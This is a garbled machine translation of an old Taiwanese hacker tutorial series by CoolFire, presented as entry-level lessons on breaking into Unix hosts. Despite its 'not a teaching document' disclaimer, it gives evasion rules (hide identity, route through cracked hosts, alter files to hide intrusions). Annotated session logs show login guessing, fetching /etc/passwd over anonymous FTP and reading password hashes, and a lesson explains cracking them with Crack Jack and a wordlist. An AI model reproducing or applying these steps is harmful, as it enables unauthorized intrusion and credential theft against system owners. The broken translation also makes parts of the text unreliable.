Author: CoolFire [firstname.lastname@example.org] (2001-10-12 15:00:00)
CoolHC Volume 1 By CoolFire Author E-Mail: email@example.com
Lin Zhenglong, a famous hacker in Taiwan, is the leader of Chinese hackers. Won COG information security Lifetime Achievement Award in 2011
Lin Zhenglong Baidu Encyclopedia
Note: this series of articles is to sort out 8 entry-level hacker articles of Coolfire. When browsing related articles on the Internet, they are either incomplete, or the article layout is extremely disordered, and the reading experience is extremely poor. In order to get a better reading experience, this series of articles is to be sorted out.
This is not a teaching document. It just tells you how to crack the system so that you can protect your system safely. If you can read this document completely, you can know how hackers invade your computer. I'm CoolFire. The purpose of this article is to let you understand the importance of computer security, It's not to teach people Crack Password. If someone invades someone's computer or network maliciously because of this file, I will not be responsible!!
It's about hacking into computers! What's the explanation? Most of the books or novels and documents about Hacker are clearly introduced. People who are addicted to computers Destroy... Alas! Just a lot of strange explanations. It's better not to be a Hacker. I No
We just want to understand more about the technology of the system, invade it, understand how it works, try its security, then learn to use it, read the instructions about the operation in the system, learn its various operations!! revolution for security!
- Do not maliciously damage any system, this will only bring you trouble. Maliciously damage other people's software will lead to legal punishment, if you only use the computer, it is only illegal use!! note: do not damage other people's software or data!!
- Do not modify any system files. If you want to enter the system and modify it, please change it back to its original state after answering the purpose
- Don't easily tell your untrusted friends that you want Hack's platform
- Don't talk about anything about your Hack on bbs
- Don't use your real name when you Post
- Don't leave your computer when you are invading
- Do not invade or damage the host of government agencies
- Don't talk about anything about your Hack on the phone
- Keep your notes in a safe place
- If you want to be a Hacker, you need to really Hacking. Read all the files about system security or system vulnerability!
- Accounts that have been hacked into the computer cannot be cleared or modified
- It is not allowed to modify the system files. If the modification is made to hide the intrusion, it is not limited. However, it is still necessary to maintain the security of the original system and not open the door because of the control of the system!!
- Do not share your cracked account with your friends
- Enter the host
- Get / etc/passwd
- Get system account
- Get the highest authority
There are several ways to access the host, which can be accessed through Telnet (Port 23) or SendMail (Port 25) or FTP or WWW (Port 80). Although a host has only one address, it can provide multiple services at the same time, so if you just want to "access" the host, these ports are good directions. Of course, there are many ports, But what can you do with DayTime's Port??? I don't know, do you know?!
The following demonstration is not as easy as it is written out, just to let you know how to enter. Of course, there are many problems, such as wrong command Wait a minute I didn't show up in class, but I did it for face We must delete these ugly things
Demonstrate how to enter the host: (By CoolFire)
(first, connect to a Telnet host with an account you already have. Of course, it's better to be a fake host, that is, a cracked host. Then use it to Crack other hosts, so that others won't find out where you are by countercurrent method.)
Digital UNIX (ms.hinet.net) (ttypa) login: FakeName Password: Last login: Mon Dec 2 03:24:00 from 255.255.0.0
I use ms.hinet.net Of course, it's fake. It has been modified!! there's no such host!! don't be afraid! Don't be afraid! The following host names are fake. Please remember!!)
Digital UNIX V1.2C (Rev. 248); Mon Oct 31 21:23:02 CST 1996 Digital UNIX V1.2C Worksystem Software (Rev. 248) Digital UNIX Chinese Support V1.2C (rev. 3)
(um... Come in! Let's attack! This time, the target is )
ms.hinet.net> telnet www.fuckyou.hinet.net (Telnet Have a try....) Trying 22.214.171.124... Connected to cool.fuckyou.hinet.net. Escape character is '^]'. Password: Login incorrect
(never mind, come again!!)
cool login: hinet Password: Login incorrect cool login:
(I didn't guess right. I used the guessing method here. It seems that I have bad luck today.)
telnet> close Connection closed.
(try another Port again!!)
ms.hinet.net> telnet 126.96.36.199 80 Trying 188.8.131.52... Connected to 184.108.40.206. Escape character is '^]'.
<HTML> <HEAD> <TITLE>Error</TITLE> </HEAD> <BODY> <H1>Error 400</H1> Invalid request "" (unknown method) <P><HR><ADDRESS><A HREF="http://www.w3.org">CERN-HTTPD 3.0A</A></ADDRESS> </BODY> </HTML> Connection closed by foreign host.
(Wow!! I don't even have to enter the password. It's really Again!! be persistent!!)
(try FTP Port)
ms.hinet.net> ftp 220.127.116.11 Connected to 18.104.22.168. 220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready. Name (22.214.171.124:FakeName): anonymous 331 Guest login ok, send your complete e-mail address as password. Password: 230-Welcome, archive user! This is an experimental FTP server. If have any 230-unusual problems, please report them via e-mail to firstname.lastname@example.org 230-If you do have problems, please try using a dash (-) as the first character 230-of your password -- this will turn off the continuation messages that may 230-be confusing your ftp client. 230- 230 Guest login ok, access restrictions apply. Remote system type is UNIX. Using binary mode to transfer files.
(Wow! You can use anonymous to come in!! just type aaa @ in the password part! Don't leave footprints!!)
ftp> ls 200 PORT command successful. 150 Opening ASCII mode data connection for file list. etc pub usr bin lib incoming welcome.msg 226 Transfer complete.
(Uh huh... Great! Coming in! The next goal is )
ftp> cd etc 250 CWD command successful. ftp> get passwd (Catch back !!) 200 PORT command successful. 150 Opening BINARY mode data connection for passwd (566 bytes). 226 Transfer complete. 566 bytes received in 0.56 seconds (0.93 Kbytes/s)
(oh... Is it so easy
ftp> !cat passwd (Have a look !!!) root::0:0:root:/root:/bin/bash bin:*:1:1:bin:/bin: daemon:*:2:2:daemon:/sbin: adm:*:3:4:adm:/var/adm: lp:*:4:7:lp:/var/spool/lpd: sync:*:5:0:sync:/sbin:/bin/sync shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown halt:*:7:0:halt:/sbin:/sbin/halt mail:*:8:12:mail:/var/spool/mail: news:*:9:13:news:/var/spool/news: uucp:*:10:14:uucp:/var/spool/uucp: operator:*:11:0:operator:/root:/bin/bash games:*:12:100:games:/usr/games: man:*:13:15:man:/usr/man: postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash ftp:*:404:1::/home/ftp:/bin/bash
(wow... It's Shadow It's a bad start )
ftp> bye 221 Goodbye.
Don't believe in evil As the old saying goes, we should have perseverance )
(FTP doesn't work. Try Telnet again!!)
ms.hinet.net> telnet www.fuckyou.hinet.net Trying 126.96.36.199... Connected to cool.fuckyou.hinet.net. Escape character is '^]'. Password: Login incorrect
(guess wrong again!!)
cool login: fuckyou Password: Last login: Mon Dec 2 09:20:07 from 188.8.131.52 Linux 1.2.13. Some programming languages manage to absorb change but withstand progress. cool:~$
(Wahaha!! which stupid root, use system name as username and password as system name Finally... No white play... )
cool:~$ system bash: system: command not found
(um... This user doesn't seem to have much permission )
cool:~$ ls cool:~$ pwd /home/fuckyou cool:~$ cd / cool:/$ ls Public/ cdrom/ lib/ mnt/ tmp/ www/ README dev/ linux* proc/ usr/ bin/ etc/ local/ root/ var/ boot/ home/ lost+found/ sbin/ cool:/$ cd etc telnet> quit
(I really want to sleep!! no more playing!! next class )
Connection closed. ms.hinet.net> exit
(left!! I'll see you next class!! it's here today! The teacher has to work first!!)
(some students say: cheat! Haven't cracked yet!! nonsense! Haven't you come in yet??? Look at what's in this class???- > enter the main engine!! mmm )
In the last lesson, I grabbed a "mess" of / etc/passwd. Do you think I'm really stupid? What's the good thing that guest can grab? So this lesson continues the last attack. In the last lesson, we have "guessed" a username and password that is not a guest. Let's use it to enter the host today!!
Digital UNIX (ms.hinet.net) (ttypa) login: FakeName Password: Last login: Mon Dec 2 03:24:00 from 255.255.0.0 Digital UNIX V1.2C (Rev. 248); Mon Oct 31 21:23:02 CST 1996 Digital UNIX V1.2C Worksystem Software (Rev. 248) Digital UNIX Chinese Support V1.2C (rev. 3)
(um... Come in! Let's attack! This time, the target is Ah... )
ms.hinet.net> telnet cool.fuckyou.hinet.net (Telnet Have a try.... Yesterday's address, Take notes!) stsvr.showtower.com.tw> telnet cool.fuckyou.hinet.net Trying 184.108.40.206... Connected to cool.fuckyou.hinet.net. Escape character is '^]'. Password: Login incorrect cool login: fuckyou Password: (Same input fuckyou) Last login: Mon Dec 1 12:44:10 from ms.hinet.net Linux 1.2.13. cool:~$ cd /etc cool:/etc$ ls DIR_COLORS ftpusers localtime resolv.conf HOSTNAME gateways magic rpc NETWORKING group mail.rc securetty NNTP_INEWS_DOMAIN host.conf motd sendmail.cf X11@ hosts messages/ sendmail.st XF86Config hosts.allow mtab services at.deny hosts.deny mtools shells bootptab hosts.equiv named.boot shutdownp csh.cshrc hosts.lpd networks snoopy/ csh.login httpd.conf nntpserver slip.hosts exports inetd.conf passwd snooptab fastboot inittab passwd.OLD syslog.conf fdprm issue passwd.old syslog.pid fstab ld.so.cache printcap ttys ftpaccess ld.so.conf profile utmp@
(looking for the target It's too messy! I'm too lazy to find it. Come again )
cool:/etc$ ls pa* passwd passwd.OLD passwd.old
cool:/etc$ more passwd
(see if there is Shadow )
root:acqQkJ2LoYp:0:0:root:/root:/bin/bash john:234ab56:9999:13:John Smith:/home/john:/bin/john
(on time! There's no defense at all!!)
cool:/etc$ exit logout
(left!... FTP to play!)
Connection closed by foreign host. ms.hinet.net> ftp www.fuckyou.hinet.net Connected to cool.fuckyou.hinet.net. 220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready. Name (www.fuckyou.hinet.net:66126): fuckyou 331 Password required for fuckyou. Password: 230 User fuckyou logged in. Remote system type is UNIX. Using binary mode to transfer files. ftp> cd /etc 250 CWD command successful. ftp> get passwd 200 PORT command successful. 150 Opening BINARY mode data connection for passwd (350 bytes). 226 Transfer complete. 350 bytes received in 0.68 seconds (1.9 Kbytes/s) ftp> !cat passwd root:acqQkJ2LoYp:0:0:root:/root:/bin/bash john:234ab56:9999:13:John Smith:/home/john:/bin/john
(look! Oh! It can't be fake!!..)
ftp> bye 221 Goodbye. ms.hinet.net> exit
(San renluo!! class is over!!... Oh, slow down. There's something else to explain )
The shadow of passwd is to put passwd in the shadow file. The passwd format you saw in the first lesson is not the real passwd
Because there's nothing in the part of the code So it's useless to take it!! but what do you get in this class? Like this, what do you need to explain is what does it mean???
It is divided into several fields with ":". The comparison of each field is as follows:
User Name: john Password:234ab56 User No: 9999 Group No: 13 Real Name: John Smith Home Dir: /home/john Shell: /bin/sh
Come on! Come on! Keep the passwd you've worked hard to get. Let's talk about how to use Crack Jack to decode passwd in the third lesson Ha ha... zzZZzZzz...
Crack Jack V1.4 instructions in Chinese (By CoolFire 12-1-1996)
Um... It's time for lesson 3!! let's go for a drink of water for the tired students first! Let's talk about Crack Jack in this lesson! This is a good tool to interpret / etc/passwd. Don't tell me that you are used to using Brute. Compare the speed of Brute and Crack Jack, and you can immediately throw yourself into the embrace of Crack Jack 1.4, but first make sure that you use Crack Jack 1.4, which you can use in CoolFire Take this version of Crack Jack from hacker & mailer page! This is the really useful version. Speed Yes... It's just that no one else can match it! But we still need to talk about its shortcomings You can only run in dos and OS2. If you run in DOS Mode on Windoz 95, it will not even care about you!
OK! Now let's get to the point! etc/passwd! Let's start! The things we need before using Crack Jack 1.4 are these  Crack Jack 1.4 $% ^ & @ @  / etc/passwd file, you can find the passwd  dictionary file in the / etc / directory of Unix system Oh, ClayMore has a dictionary with more than 1000 words, but it's much smaller than my dictionary. It's also in LetMeIn! 1.0. Listen to James
When we say 2.0 Release, there will be better dictionary files included. Look forward to it Before using Crack Jack 1.4, you need to make sure that the machine you are using has 386 or more CPU s! Then you'd better have enough memory!!
At the beginning of Jack, just type jack. It will ask you PW Name Enter your passwd file name, dictionarynameenter your dictionary file name, Jack will start to find it! When you find it, you will be told, and the password it found will be written in JACK.POT!! but Strange format! If you find a password with root permission, Jack will tell you this isajackass Um... Swearing!! because it takes too much time to use Jack. If you want to stop halfway, just
Just press Ctrl-C, don't think you've lost all your efforts! Because Jack has a RESTORE function, it will be automatically saved as RESTORE when it is interrupted. Next time you want to continue this search, just enter Jack RESTORE: RESTORE!! of course, you can rename your RESTORE! Jack will also find it For example, if you want to search after Ren restore restore.HNT, just Jack -Restore:RESTORE.HNT Jack will automatically RESTORE the last string he was looking for Keep looking for you
Where to find the dictionary file: I won't give it to you! You can find other programs such as Brute Force. Some of them will be attached, or you can find other Hacker underground stations to see if there is one. You can make one by yourself, or find an English Chinese dictionary software to solve the part of the dictionary, which may have some information fields and the basis for writing programs
[no example in this lesson] successful case: found the root password of an online coffee shop! Jack is on time!!! Time taken: about 20 minutes But I can't find it in a day or two Woo... Hackers! Come on!!